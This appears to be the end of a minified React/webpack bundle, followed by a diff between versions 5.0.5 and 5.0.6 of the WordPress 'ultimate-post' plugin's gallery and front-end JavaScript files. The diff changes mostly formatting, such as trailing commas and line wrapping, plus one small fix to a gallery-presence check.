0===t&&(t=null),(e={$$typeof:l,_calculateChangedBits:t,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:i,_context:e},e.Consumer=e},t.createElement=k,t.createFactory=function(e){var t=k.bind(null,e);return t.type=e,t},t.createRef=function(){return{current:null}},t.forwardRef=function(e){return{$$typeof:s,render:e}},t.isValidElement=E,t.lazy=function(e){return{$$typeof:c,_payload:{_status:-1,_result:e},_init:N}},t.memo=function(e,t){return{$$typeof:p,type:e,compare:void 0===t?null:t}},t.useCallback=function(e,t){return P().useCallback(e,t)},t.useContext=function(e,t){return P().useContext(e,t)},t.useDebugValue=function(){},t.useEffect=function(e,t){return P().useEffect(e,t)},t.useImperativeHandle=function(e,t,n){return P().useImperativeHandle(e,t,n)},t.useLayoutEffect=function(e,t){return P().useLayoutEffect(e,t)},t.useMemo=function(e,t){return P().useMemo(e,t)},t.useReducer=function(e,t,n){return P().useReducer(e,t,n)},t.useRef=function(e){return P().useRef(e)},t.useState=function(e){return P().useState(e)},t.version="17.0.2"},7294:(e,t,n)=>{"use strict";e.exports=n(2408)},53:(e,t)=>{"use strict";var n,a,r,o;if("object"==typeof performance&&"function"==typeof performance.now){var i=performance;t.unstable_now=function(){return i.now()}}else{var l=Date,s=l.now();t.unstable_now=function(){return l.now()-s}}if("undefined"==typeof window||"function"!=typeof MessageChannel){var p=null,c=null,d=function(){if(null!==p)try{var e=t.unstable_now();p(!0,e),p=null}catch(e){throw setTimeout(d,0),e}};n=function(e){null!==p?setTimeout(n,0,e):(p=e,setTimeout(d,0))},a=function(e,t){c=setTimeout(e,t)},r=function(){clearTimeout(c)},t.unstable_shouldYield=function(){return!1},o=t.unstable_forceFrameRate=function(){}}else{var u=window.setTimeout,m=window.clearTimeout;if("undefined"!=typeof console){var f=window.cancelAnimationFrame;"function"!=typeof window.requestAnimationFrame&&console.error("This browser doesn't support requestAnimationFrame. Make sure that you load a polyfill in older browsers. https://reactjs.org/link/react-polyfills"),"function"!=typeof f&&console.error("This browser doesn't support cancelAnimationFrame. Make sure that you load a polyfill in older browsers. https://reactjs.org/link/react-polyfills")}var h=!1,g=null,v=-1,_=5,w=0;t.unstable_shouldYield=function(){return t.unstable_now()>=w},o=function(){},t.unstable_forceFrameRate=function(e){0>e||125<e?console.error("forceFrameRate takes a positive int between 0 and 125, forcing frame rates higher than 125 fps is not supported"):_=0<e?Math.floor(1e3/e):5};var b=new MessageChannel,x=b.port2;b.port1.onmessage=function(){if(null!==g){var e=t.unstable_now();w=e+_;try{g(!0,e)?x.postMessage(null):(h=!1,g=null)}catch(e){throw x.postMessage(null),e}}else h=!1},n=function(e){g=e,h||(h=!0,x.postMessage(null))},a=function(e,n){v=u((function(){e(t.unstable_now())}),n)},r=function(){m(v),v=-1}}function y(e,t){var n=e.length;e.push(t);e:for(;;){var a=n-1>>>1,r=e[a];if(!(void 0!==r&&0<C(r,t)))break e;e[a]=t,e[n]=r,n=a}}function k(e){return void 0===(e=e[0])?null:e}function E(e){var t=e[0];if(void 0!==t){var n=e.pop();if(n!==t){e[0]=n;e:for(var a=0,r=e.length;a<r;){var o=2*(a+1)-1,i=e[o],l=o+1,s=e[l];if(void 0!==i&&0>C(i,n))void 0!==s&&0>C(s,i)?(e[a]=s,e[l]=n,a=l):(e[a]=i,e[o]=n,a=o);else{if(!(void 0!==s&&0>C(s,n)))break e;e[a]=s,e[l]=n,a=l}}}return t}return null}function C(e,t){var n=e.sortIndex-t.sortIndex;return 0!==n?n:e.id-t.id}var S=[],M=[],L=1,N=null,Z=3,P=!1,z=!1,A=!1;function B(e){for(var t=k(M);null!==t;){if(null===t.callback)E(M);else{if(!(t.startTime<=e))break;E(M),t.sortIndex=t.expirationTime,y(S,t)}t=k(M)}}function H(e){if(A=!1,B(e),!z)if(null!==k(S))z=!0,n(T);else{var t=k(M);null!==t&&a(H,t.startTime-e)}}function T(e,n){z=!1,A&&(A=!1,r()),P=!0;var o=Z;try{for(B(n),N=k(S);null!==N&&(!(N.expirationTime>n)||e&&!t.unstable_shouldYield());){var i=N.callback;if("function"==typeof i){N.callback=null,Z=N.priorityLevel;var l=i(N.expirationTime<=n);n=t.unstable_now(),"function"==typeof l?N.callback=l:N===k(S)&&E(S),B(n)}else E(S);N=k(S)}if(null!==N)var s=!0;else{var p=k(M);null!==p&&a(H,p.startTime-n),s=!1}return s}finally{N=null,Z=o,P=!1}}var R=o;t.unstable_IdlePriority=5,t.unstable_ImmediatePriority=1,t.unstable_LowPriority=4,t.unstable_NormalPriority=3,t.unstable_Profiling=null,t.unstable_UserBlockingPriority=2,t.unstable_cancelCallback=function(e){e.callback=null},t.unstable_continueExecution=function(){z||P||(z=!0,n(T))},t.unstable_getCurrentPriorityLevel=function(){return Z},t.unstable_getFirstCallbackNode=function(){return k(S)},t.unstable_next=function(e){switch(Z){case 1:case 2:case 3:var t=3;break;default:t=Z}var n=Z;Z=t;try{return e()}finally{Z=n}},t.unstable_pauseExecution=function(){},t.unstable_requestPaint=R,t.unstable_runWithPriority=function(e,t){switch(e){case 1:case 2:case 3:case 4:case 5:break;default:e=3}var n=Z;Z=e;try{return t()}finally{Z=n}},t.unstable_scheduleCallback=function(e,o,i){var l=t.unstable_now();switch(i="object"==typeof i&&null!==i&&"number"==typeof(i=i.delay)&&0<i?l+i:l,e){case 1:var s=-1;break;case 2:s=250;break;case 5:s=1073741823;break;case 4:s=1e4;break;default:s=5e3}return e={id:L++,callback:o,priorityLevel:e,startTime:i,expirationTime:s=i+s,sortIndex:-1},i>l?(e.sortIndex=i,y(M,e),null===k(S)&&e===k(M)&&(A?r():A=!0,a(H,i-l))):(e.sortIndex=s,y(S,e),z||P||(z=!0,n(T))),e},t.unstable_wrapCallback=function(e){var t=Z;return function(){var n=Z;Z=t;try{return e.apply(this,arguments)}finally{Z=n}}}},3840:(e,t,n)=>{"use strict";e.exports=n(53)},8975:(e,t,n)=>{var a;!function(){"use strict";var r={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function o(e){return function(e,t){var n,a,i,l,s,p,c,d,u,m=1,f=e.length,h="";for(a=0;a<f;a++)if("string"==typeof e[a])h+=e[a];else if("object"==typeof e[a]){if((l=e[a]).keys)for(n=t[m],i=0;i<l.keys.length;i++){if(null==n)throw new Error(o('[sprintf] Cannot access property "%s" of undefined value "%s"',l.keys[i],l.keys[i-1]));n=n[l.keys[i]]}else n=l.param_no?t[l.param_no]:t[m++];if(r.not_type.test(l.type)&&r.not_primitive.test(l.type)&&n instanceof Function&&(n=n()),r.numeric_arg.test(l.type)&&"number"!=typeof n&&isNaN(n))throw new TypeError(o("[sprintf] expecting number but found %T",n));switch(r.number.test(l.type)&&(d=n>=0),l.type){case"b":n=parseInt(n,10).toString(2);break;case"c":n=String.fromCharCode(parseInt(n,10));break;case"d":case"i":n=parseInt(n,10);break;case"j":n=JSON.stringify(n,null,l.width?parseInt(l.width):0);break;case"e":n=l.precision?parseFloat(n).toExponential(l.precision):parseFloat(n).toExponential();break;case"f":n=l.precision?parseFloat(n).toFixed(l.precision):parseFloat(n);break;case"g":n=l.precision?String(Number(n.toPrecision(l.precision))):parseFloat(n);break;case"o":n=(parseInt(n,10)>>>0).toString(8);break;case"s":n=String(n),n=l.precision?n.substring(0,l.precision):n;break;case"t":n=String(!!n),n=l.precision?n.substring(0,l.precision):n;break;case"T":n=Object.prototype.toString.call(n).slice(8,-1).toLowerCase(),n=l.precision?n.substring(0,l.precision):n;break;case"u":n=parseInt(n,10)>>>0;break;case"v":n=n.valueOf(),n=l.precision?n.substring(0,l.precision):n;break;case"x":n=(parseInt(n,10)>>>0).toString(16);break;case"X":n=(parseInt(n,10)>>>0).toString(16).toUpperCase()}r.json.test(l.type)?h+=n:(!r.number.test(l.type)||d&&!l.sign?u="":(u=d?"+":"-",n=n.toString().replace(r.sign,"")),p=l.pad_char?"0"===l.pad_char?"0":l.pad_char.charAt(1):" ",c=l.width-(u+n).length,s=l.width&&c>0?p.repeat(c):"",h+=l.align?u+n+s:"0"===p?u+s+n:s+u+n)}return h}(function(e){if(l[e])return l[e];for(var t,n=e,a=[],o=0;n;){if(null!==(t=r.text.exec(n)))a.push(t[0]);else if(null!==(t=r.modulo.exec(n)))a.push("%");else{if(null===(t=r.placeholder.exec(n)))throw new SyntaxError("[sprintf] unexpected placeholder");if(t[2]){o|=1;var i=[],s=t[2],p=[];if(null===(p=r.key.exec(s)))throw new SyntaxError("[sprintf] failed to parse named argument key");for(i.push(p[1]);""!==(s=s.substring(p[0].length));)if(null!==(p=r.key_access.exec(s)))i.push(p[1]);else{if(null===(p=r.index_access.exec(s)))throw new SyntaxError("[sprintf] failed to parse named argument key");i.push(p[1])}t[2]=i}else o|=2;if(3===o)throw new Error("[sprintf] mixing positional and named placeholders is not (yet) supported");a.push({placeholder:t[0],param_no:t[1],keys:t[2],sign:t[3],pad_char:t[4],align:t[5],width:t[6],precision:t[7],type:t[8]})}n=n.substring(t[0].length)}return l[e]=a}(e),arguments)}function i(e,t){return o.apply(null,[e].concat(t||[]))}var l=Object.create(null);"undefined"!=typeof window&&(window.sprintf=o,window.vsprintf=i,void 0===(a=function(){return{sprintf:o,vsprintf:i}}.call(t,n,t,e))||(e.exports=a))}()},6129:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(6511),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},563:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(3038),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3493:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(725),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},9780:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(5735),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},8350:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(9455),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},8009:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(886),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2156:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(283),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},977:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(4421),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},7376:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(2041),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},6680:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(6657),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3479:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(2793),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},4602:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(4558),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3358:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(6922),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2413:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(439),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},6509:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(9839),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},619:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1211),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2158:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1589),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},4201:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1729),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3379:e=>{"use strict";var t=[];function n(e){for(var n=-1,a=0;a<t.length;a++)if(t[a].identifier===e){n=a;break}return n}function a(e,a){for(var o={},i=[],l=0;l<e.length;l++){var s=e[l],p=a.base?s[0]+a.base:s[0],c=o[p]||0,d="".concat(p," ").concat(c);o[p]=c+1;var u=n(d),m={css:s[1],media:s[2],sourceMap:s[3],supports:s[4],layer:s[5]};if(-1!==u)t[u].references++,t[u].updater(m);else{var f=r(m,a);a.byIndex=l,t.splice(l,0,{identifier:d,updater:f,references:1})}i.push(d)}return i}function r(e,t){var n=t.domAPI(t);return n.update(e),function(t){if(t){if(t.css===e.css&&t.media===e.media&&t.sourceMap===e.sourceMap&&t.supports===e.supports&&t.layer===e.layer)return;n.update(e=t)}else n.remove()}}e.exports=function(e,r){var o=a(e=e||[],r=r||{});return function(e){e=e||[];for(var i=0;i<o.length;i++){var l=n(o[i]);t[l].references--}for(var s=a(e,r),p=0;p<o.length;p++){var c=n(o[p]);0===t[c].references&&(t[c].updater(),t.splice(c,1))}o=s}}},569:e=>{"use strict";var t={};e.exports=function(e,n){var a=function(e){if(void 0===t[e]){var n=document.querySelector(e);if(window.HTMLIFrameElement&&n instanceof window.HTMLIFrameElement)try{n=n.contentDocument.head}catch(e){n=null}t[e]=n}return t[e]}(e);if(!a)throw new Error("Couldn't find a style target. This probably means that the value for the 'insert' parameter is invalid.");a.appendChild(n)}},9216:e=>{"use strict";e.exports=function(e){var t=document.createElement("style");return e.setAttributes(t,e.attributes),e.insert(t,e.options),t}},3565:(e,t,n)=>{"use strict";e.exports=function(e){var t=n.nc;t&&e.setAttribute("nonce",t)}},7795:e=>{"use strict";e.exports=function(e){if("undefined"==typeof document)return{update:function(){},remove:function(){}};var t=e.insertStyleElement(e);return{update:function(n){!function(e,t,n){var a="";n.supports&&(a+="@supports (".concat(n.supports,") {")),n.media&&(a+="@media ".concat(n.media," {"));var r=void 0!==n.layer;r&&(a+="@layer".concat(n.layer.length>0?" ".concat(n.layer):""," {")),a+=n.css,r&&(a+="}"),n.media&&(a+="}"),n.supports&&(a+="}");var o=n.sourceMap;o&&"undefined"!=typeof btoa&&(a+="\n/*# sourceMappingURL=data:application/json;base64,".concat(btoa(unescape(encodeURIComponent(JSON.stringify(o))))," */")),t.styleTagTransform(a,e,t.options)}(t,e,n)},remove:function(){!function(e){if(null===e.parentNode)return!1;e.parentNode.removeChild(e)}(t)}}}},4589:e=>{"use strict";e.exports=function(e,t){if(t.styleSheet)t.styleSheet.cssText=e;else{for(;t.firstChild;)t.removeChild(t.firstChild);t.appendChild(document.createTextNode(e))}}},5022:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7680),r={contextDelimiter:"",onMissingKey:null};function o(e,t){var n;for(n in this.data=e,this.pluralForms={},this.options={},r)this.options[n]=void 0!==t&&n in t?t[n]:r[n]}o.prototype.getPluralForm=function(e,t){var n,r,o,i=this.pluralForms[e];return i||("function"!=typeof(o=(n=this.data[e][""])["Plural-Forms"]||n["plural-forms"]||n.plural_forms)&&(r=function(e){var t,n,a;for(t=e.split(";"),n=0;n<t.length;n++)if(0===(a=t[n].trim()).indexOf("plural="))return a.substr(7)}(n["Plural-Forms"]||n["plural-forms"]||n.plural_forms),o=(0,a.Z)(r)),i=this.pluralForms[e]=o),i(t)},o.prototype.dcnpgettext=function(e,t,n,a,r){var o,i,l;return o=void 0===r?0:this.getPluralForm(e,r),i=n,t&&(i=t+this.options.contextDelimiter+n),(l=this.data[e][i])&&l[o]?l[o]:(this.options.onMissingKey&&this.options.onMissingKey(n,e),0===o?n:a)}},4975:e=>{"use strict";e.exports="data:image/svg+xml,%3Csvg width=%2742%27 height=%2742%27 viewBox=%270 0 42 42%27 fill=%27none%27 xmlns=%27http://www.w3.org/2000/svg%27%3E%3Cpath d=%27M0 42V7C0 3.13401 3.13401 0 7 0H42L0 42Z%27 fill=%27%23FF285E%27/%3E%3C/svg%3E"},7462:(e,t,n)=>{"use strict";function a(){return a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a])}return e},a.apply(this,arguments)}n.d(t,{Z:()=>a})},6290:(e,t,n)=>{"use strict";function a(e,t){var n,a,r=0;function o(){var o,i,l=n,s=arguments.length;e:for(;l;){if(l.args.length===arguments.length){for(i=0;i<s;i++)if(l.args[i]!==arguments[i]){l=l.next;continue e}return l!==n&&(l===a&&(a=l.prev),l.prev.next=l.next,l.next&&(l.next.prev=l.prev),l.next=n,l.prev=null,n.prev=l,n=l),l.val}l=l.next}for(o=new Array(s),i=0;i<s;i++)o[i]=arguments[i];return l={args:o,val:e.apply(null,o)},n?(n.prev=l,l.next=n):a=l,r===t.maxSize?(a=a.prev).next=null:r++,n=l,l.val}return t=t||{},o.clear=function(){n=null,a=null,r=0},o}n.d(t,{Z:()=>a})}},t={};function n(a){var r=t[a];if(void 0!==r)return r.exports;var o=t[a]={id:a,exports:{}};return e[a](o,o.exports,n),o.exports}n.m=e,n.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return n.d(t,{a:t}),t},n.d=(e,t)=>{for(var a in t)n.o(t,a)&&!n.o(e,a)&&Object.defineProperty(e,a,{enumerable:!0,get:t[a]})},n.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),n.b=document.baseURI||self.location.href,n.nc=void 0,n(1383)})();
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp-gallery-block.js /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp-gallery-block.js
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp-gallery-block.js	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp-gallery-block.js	2026-02-02 04:04:06.000000000 +0000
@@ -1,6 +1,6 @@
 (function ($) {
 	"use strict";
-	const galleryAvailable = $(".wp-block-ultimate-post-gallery").length == 0;
+	let galleryAvailable = $(".wp-block-ultimate-post-gallery").length != 0;
 	$(".wp-block-ultimate-post-gallery").each(function () {
 		const gl = $(this);
 		handleUltpGalleryBlock(gl);
@@ -31,7 +31,7 @@
 		const galleryControl = element.find(".ultp-gallery-lightbox__control");
 		const fullScreen = element.find(".ultp-gallery-lightbox__full-screen");
 		const galleryIndicator = element.find(
-			".ultp-gallery-lightbox__indicator-control"
+			".ultp-gallery-lightbox__indicator-control",
 		);
 
 		let galleryIndex = null;
@@ -46,7 +46,7 @@
 
 			const isInsideLightboxControl =
 				$target.closest(
-					".ultp-gallery-lightbox__control, .ultp-lightbox__left-icon, .ultp-lightbox__right-icon, .ultp-lightbox__img-container, .ultp-lightbox-indicator__item-img"
+					".ultp-gallery-lightbox__control, .ultp-lightbox__left-icon, .ultp-lightbox__right-icon, .ultp-lightbox__img-container, .ultp-lightbox-indicator__item-img",
 				).length > 0;
 
 			if (!isInsideLightboxControl && !lightboxVisible) {
@@ -180,7 +180,7 @@
 							imgCaption,
 							glSelector,
 							lightboxCaption,
-							lightboxIndicator
+							lightboxIndicator,
 						);
 					});
 			});
@@ -235,7 +235,7 @@
 				if ($activeIndicator.data("id") !== itemId) {
 					$activeIndicator.removeClass("lightbox-active");
 				}
-			}
+			},
 		);
 
 		$(document).on("click", ".ultp-lightbox-indicator__item", function () {
@@ -269,7 +269,7 @@
 					const imgIndex = glSelector.data("index");
 					const imgSrc = glSelector.find(".ultp-gallery-media img").attr("src");
 					const appendSelector = glSelector.find(
-						".ultp-gallery-action-container"
+						".ultp-gallery-action-container",
 					);
 					handleLightBox(
 						glSelector,
@@ -279,7 +279,7 @@
 						imgCaption,
 						appendSelector,
 						lightboxCaption,
-						lightboxIndicator
+						lightboxIndicator,
 					);
 				}
 			});
@@ -290,8 +290,8 @@
 			? Number(
 					getComputedStyle(loadMoreButton[0])
 						.getPropertyValue("--ultp-gallery-count")
-						.trim()
-			  )
+						.trim(),
+				)
 			: "";
 		let rootImgCount = loadMoreCount;
 
@@ -328,7 +328,7 @@
 			imgCaption,
 			appendSelector,
 			lightboxCaption,
-			lightboxIndicator
+			lightboxIndicator,
 		) {
 			galleryControl.css({ display: "flex" });
 			$(".ultp-lightbox").remove();
@@ -380,30 +380,30 @@
 		const tiled = $gallery.find(".ultp-gallery-container.ultp-gallery-tiled");
 
 		const masonry = $gallery.find(
-			".ultp-gallery-container.ultp-gallery-masonry"
+			".ultp-gallery-container.ultp-gallery-masonry",
 		);
 
 		const columns = container[0]
 			? Number(
 					getComputedStyle(container[0])
 						.getPropertyValue("--ultp-gallery-columns")
-						.trim()
-			  )
+						.trim(),
+				)
 			: 3;
 		const gap = container[0]
 			? Number(
 					getComputedStyle(container[0])
 						.getPropertyValue("--ultp-gallery-gap")
-						.trim()
-			  )
+						.trim(),
+				)
 			: 10;
 		const galleryItems = container.find(".ultp-gallery-item");
 		const loadMoreCount = loadMoreButton[0]
 			? Number(
 					getComputedStyle(loadMoreButton[0])
 						.getPropertyValue("--ultp-gallery-count")
-						.trim()
-			  )
+						.trim(),
+				)
 			: 0;
 
 		let rootImgCount = loadMoreCount;
@@ -436,7 +436,7 @@
 		// Add No Gallery Message
 		if ($noItems.length === 0) {
 			$noItems = $(
-				'<div class="ultp-no-gallery-message">No gallery item found</div>'
+				'<div class="ultp-no-gallery-message">No gallery item found</div>',
 			);
 			container.after($noItems);
 		}
@@ -521,7 +521,7 @@
 			showLoader(() => {
 				const { visibleCount, totalMatch } = updateVisibleItemsByFilter(
 					selectedTag,
-					rootImgCount
+					rootImgCount,
 				);
 				loadMoreButton.css({
 					display: visibleCount < totalMatch ? "block" : "none",
@@ -580,7 +580,7 @@
 			const customHeight = Number(
 				getComputedStyle(container[0])
 					.getPropertyValue("--ultp-gallery-height")
-					.trim()
+					.trim(),
 			);
 
 			const rowHeight = customHeight || 300; // FIX ME → the target rendered height
@@ -659,7 +659,7 @@
 					.text() || "All";
 			const { visibleCount, totalMatch } = updateVisibleItemsByFilter(
 				initialFilter,
-				rootImgCount
+				rootImgCount,
 			);
 			loadMoreButton.css({
 				display: visibleCount < totalMatch ? "block" : "none",
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp.js /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp.js
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp.js	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp.js	2026-02-02 04:04:06.000000000 +0000
@@ -48,7 +48,9 @@
 				},
 				error: function (xhr) {
 					console.log(
-						"Error occured.please try again" + xhr.statusText + xhr.responseText
+						"Error occured.please try again" +
+							xhr.statusText +
+							xhr.responseText,
 					);
 				},
 			});
@@ -63,11 +65,11 @@
 			$("footer")?.offset()?.top
 		) {
 			$(
-				".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer"
+				".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer",
 			).addClass("remove-sticky");
 		} else {
 			$(
-				".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer"
+				".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer",
 			).removeClass("remove-sticky");
 		}
 	});
@@ -114,7 +116,7 @@
 		} else {
 			$(".ultp-toc-backtotop").removeClass("tocshow");
 			$(".wp-block-ultimate-post-table-of-content").removeClass(
-				"ultp-toc-scroll"
+				"ultp-toc-scroll",
 			);
 		}
 	}
@@ -139,7 +141,7 @@
 			{
 				scrollTop: $($(this).attr("href")).offset().top - 50,
 			},
-			500
+			500,
 		);
 	});
 
@@ -172,7 +174,7 @@
 			$(".flexMenu-viewMore")
 				.children("ul.flexMenu-popup")
 				.css("display", "none");
-		}
+		},
 	);
 
 	// *************************************
@@ -204,7 +206,7 @@
 	$(document).off(
 		"click",
 		".ultp-pagination-ajax-action li, .ultp-loadmore-action, .ultp-prev-action, .ultp-next-action",
-		function (e) {}
+		function (e) {},
 	);
